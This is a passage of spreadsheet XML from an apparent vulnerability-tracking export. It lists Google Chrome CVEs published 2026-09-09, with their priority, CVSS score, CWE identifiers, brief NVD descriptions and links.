      <c r="O1158" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1158" s="5" t="inlineStr"/>
      <c r="Q1158" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1158" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Web Authentication in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted Chrome extension. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87561</t>
        </is>
      </c>
    </row>
    <row r="1159">
      <c r="A1159" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1159" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87562</t>
        </is>
      </c>
      <c r="D1159" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1159" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1159" s="5" t="inlineStr"/>
      <c r="H1159" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1159" s="5" t="inlineStr"/>
      <c r="J1159" s="5" t="inlineStr"/>
      <c r="K1159" s="5" t="inlineStr">
        <is>
          <t>apple:macos, google:chrome</t>
        </is>
      </c>
      <c r="L1159" s="5" t="inlineStr"/>
      <c r="M1159" s="5" t="inlineStr"/>
      <c r="N1159" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1159" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1159" s="5" t="inlineStr"/>
      <c r="Q1159" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="R1159" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Accessibility in Google Chrome on on Mac prior to 153.0.8010.36 allowed a remote attacker to potentially spoof UI elements via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87562</t>
        </is>
      </c>
    </row>
    <row r="1160">
      <c r="A1160" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1160" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87563</t>
        </is>
      </c>
      <c r="D1160" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1160" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1160" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1160" s="5" t="inlineStr"/>
      <c r="H1160" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1160" s="5" t="inlineStr"/>
      <c r="J1160" s="5" t="inlineStr"/>
      <c r="K1160" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1160" s="5" t="inlineStr"/>
      <c r="M1160" s="5" t="inlineStr"/>
      <c r="N1160" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1160" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1160" s="5" t="inlineStr"/>
      <c r="Q1160" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="R1160" s="5" t="inlineStr">
        <is>
          <t>Origin validation error in Paint in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87563</t>
        </is>
      </c>
    </row>
    <row r="1161">
      <c r="A1161" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1161" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87564</t>
        </is>
      </c>
      <c r="D1161" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1161" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1161" s="5" t="inlineStr"/>
      <c r="H1161" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1161" s="5" t="inlineStr"/>
      <c r="J1161" s="5" t="inlineStr"/>
      <c r="K1161" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1161" s="5" t="inlineStr"/>
      <c r="M1161" s="5" t="inlineStr"/>
      <c r="N1161" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1161" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1161" s="5" t="inlineStr"/>
      <c r="Q1161" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="R1161" s="5" t="inlineStr">
        <is>
          <t>Type confusion in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to read memory inside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S1161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87564</t>
        </is>
      </c>
    </row>
    <row r="1162">
      <c r="A1162" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1162" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87567</t>
        </is>
      </c>
      <c r="D1162" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1162" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1162" s="5" t="inlineStr"/>
      <c r="H1162" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1162" s="5" t="inlineStr"/>
      <c r="J1162" s="5" t="inlineStr"/>
      <c r="K1162" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1162" s="5" t="inlineStr"/>
      <c r="M1162" s="5" t="inlineStr"/>
      <c r="N1162" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1162" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1162" s="5" t="inlineStr"/>
      <c r="Q1162" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="R1162" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in UrlFormatting in Google Chrome prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to spoof address bar via a crafted domain name. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87567</t>
        </is>
      </c>
    </row>
    <row r="1163">
      <c r="A1163" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1163" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87568</t>
        </is>
      </c>
      <c r="D1163" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1163" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1163" s="5" t="inlineStr"/>
      <c r="H1163" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1163" s="5" t="inlineStr"/>
      <c r="J1163" s="5" t="inlineStr"/>
      <c r="K1163" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1163" s="5" t="inlineStr"/>
      <c r="M1163" s="5" t="inlineStr"/>
      <c r="N1163" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1163" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1163" s="5" t="inlineStr"/>
      <c r="Q1163" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1163" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Chromium in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to spoof UI elements via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87568</t>
        </is>
      </c>
    </row>
    <row r="1164">
      <c r="A1164" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1164" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87573</t>
        </is>
      </c>
      <c r="D1164" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1164" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1164" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1164" s="5" t="inlineStr"/>
      <c r="H1164" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1164" s="5" t="inlineStr"/>
      <c r="J1164" s="5" t="inlineStr"/>
      <c r="K1164" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1164" s="5" t="inlineStr"/>
      <c r="M1164" s="5" t="inlineStr"/>
      <c r="N1164" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1164" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1164" s="5" t="inlineStr"/>
      <c r="Q1164" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1164" s="5" t="inlineStr">
        <is>
          <t>Improper input validation in Network in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87573</t>
        </is>
      </c>
    </row>
    <row r="1165">
      <c r="A1165" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1165" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87574</t>
        </is>
      </c>
      <c r="D1165" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1165" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1165" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1165" s="5" t="inlineStr"/>
      <c r="H1165" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1165" s="5" t="inlineStr"/>
      <c r="J1165" s="5" t="inlineStr"/>
      <c r="K1165" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1165" s="5" t="inlineStr"/>
      <c r="M1165" s="5" t="inlineStr"/>
      <c r="N1165" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1165" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1165" s="5" t="inlineStr"/>
      <c r="Q1165" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1165" s="5" t="inlineStr">
        <is>
          <t>Information leak in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to obtain cross-origin data via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87574</t>
        </is>
      </c>
    </row>
    <row r="1166">
      <c r="A1166" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1166" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87577</t>
        </is>
      </c>
      <c r="D1166" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1166" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1166" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1166" s="5" t="inlineStr"/>
      <c r="H1166" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1166" s="5" t="inlineStr"/>
      <c r="J1166" s="5" t="inlineStr"/>
      <c r="K1166" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1166" s="5" t="inlineStr"/>
      <c r="M1166" s="5" t="inlineStr"/>
      <c r="N1166" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1166" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1166" s="5" t="inlineStr"/>
      <c r="Q1166" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1166" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Isolated in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy into a privileged page via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87577</t>
        </is>
      </c>
    </row>
    <row r="1167">
      <c r="A1167" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1167" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87586</t>
        </is>
      </c>
      <c r="D1167" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1167" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1167" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1167" s="5" t="inlineStr"/>
      <c r="H1167" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1167" s="5" t="inlineStr"/>
      <c r="J1167" s="5" t="inlineStr"/>
      <c r="K1167" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1167" s="5" t="inlineStr"/>
      <c r="M1167" s="5" t="inlineStr"/>
      <c r="N1167" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1167" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1167" s="5" t="inlineStr"/>
      <c r="Q1167" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1167" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87586</t>
        </is>
      </c>
    </row>
    <row r="1168">
      <c r="A1168" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1168" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87592</t>
        </is>
      </c>
      <c r="D1168" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1168" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1168" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1168" s="5" t="inlineStr"/>
      <c r="H1168" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1168" s="5" t="inlineStr"/>
      <c r="J1168" s="5" t="inlineStr"/>
      <c r="K1168" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1168" s="5" t="inlineStr"/>
      <c r="M1168" s="5" t="inlineStr"/>
      <c r="N1168" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1168" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1168" s="5" t="inlineStr"/>
      <c r="Q1168" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1168" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in Tint in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially read memory inside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87592</t>
        </is>
      </c>
    </row>
    <row r="1169">
      <c r="A1169" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1169" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87596</t>
        </is>
      </c>
      <c r="D1169" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1169" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1169" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1169" s="5" t="inlineStr"/>
      <c r="H1169" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1169" s="5" t="inlineStr"/>
      <c r="J1169" s="5" t="inlineStr"/>
      <c r="K1169" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1169" s="5" t="inlineStr"/>
      <c r="M1169" s="5" t="inlineStr"/>
      <c r="N1169" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1169" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1169" s="5" t="inlineStr"/>
      <c r="Q1169" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1169" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S1169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87596</t>
        </is>
      </c>
    </row>
    <row r="1170">
      <c r="A1170" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1170" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87598</t>
        </is>
      </c>
      <c r="D1170" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1170" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1170" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1170" s="5" t="inlineStr"/>
      <c r="H1170" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1170" s="5" t="inlineStr"/>
      <c r="J1170" s="5" t="inlineStr"/>
      <c r="K1170" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1170" s="5" t="inlineStr"/>
      <c r="M1170" s="5" t="inlineStr"/>
      <c r="N1170" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1170" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1170" s="5" t="inlineStr"/>
      <c r="Q1170" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1170" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87598</t>
        </is>
      </c>
    </row>
    <row r="1171">
      <c r="A1171" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1171" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87619</t>
        </is>
      </c>
      <c r="D1171" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1171" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1171" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1171" s="5" t="inlineStr"/>
      <c r="H1171" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1171" s="5" t="inlineStr"/>
      <c r="J1171" s="5" t="inlineStr"/>
      <c r="K1171" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1171" s="5" t="inlineStr"/>
      <c r="M1171" s="5" t="inlineStr"/>
      <c r="N1171" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1171" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1171" s="5" t="inlineStr"/>
      <c r="Q1171" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="R1171" s="5" t="inlineStr">
        <is>
          <t>Observable discrepancy in Prefetch in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87619</t>
        </is>
      </c>
    </row>
    <row r="1172">
      <c r="A1172" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1172" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87622</t>
        </is>
      </c>
      <c r="D1172" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1172" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1172" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1172" s="5" t="inlineStr"/>
      <c r="H1172" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1172" s="5" t="inlineStr"/>
      <c r="J1172" s="5" t="inlineStr"/>
      <c r="K1172" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1172" s="5" t="inlineStr"/>
      <c r="M1172" s="5" t="inlineStr"/>
      <c r="N1172" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1172" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1172" s="5" t="inlineStr"/>
      <c r="Q1172" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1172" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in FedCM in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87622</t>
        </is>
      </c>
    </row>
    <row r="1173">
      <c r="A1173" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1173" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87630</t>
        </is>
      </c>
      <c r="D1173" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1173" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1173" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1173" s="5" t="inlineStr"/>
      <c r="H1173" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1173" s="5" t="inlineStr"/>
      <c r="J1173" s="5" t="inlineStr"/>
      <c r="K1173" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1173" s="5" t="inlineStr"/>
      <c r="M1173" s="5" t="inlineStr"/>
      <c r="N1173" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1173" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1173" s="5" t="inlineStr"/>
      <c r="Q1173" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R1173" s="5" t="inlineStr">
        <is>
          <t>Integer overflow in WebRTC in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to read memory inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87630</t>
        </is>
      </c>
    </row>
    <row r="1174">
      <c r="A1174" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1174" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1174" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87632</t>
        </is>
      </c>
      <c r="D1174" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1174" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1174" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1174" s="5" t="inlineStr"/>
      <c r="H1174" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1174" s="5" t="inlineStr"/>
      <c r="J1174" s="5" t="inlineStr"/>
      <c r="K1174" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1174" s="5" t="inlineStr"/>
      <c r="M1174" s="5" t="inlineStr"/>
      <c r="N1174" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1174" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1174" s="5" t="inlineStr"/>
      <c r="Q1174" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1174" s="5" t="inlineStr">
        <is>
          <t>Cross-site scripting in SanitizerAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1174" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87632</t>
        </is>
      </c>
    </row>
    <row r="1175">
      <c r="A1175" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1175" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1175" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87642</t>
        </is>
      </c>
      <c r="D1175" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1175" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1175" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1175" s="5" t="inlineStr"/>
      <c r="H1175" s="5" t="n">
        <v>0.003</v>
      </c>
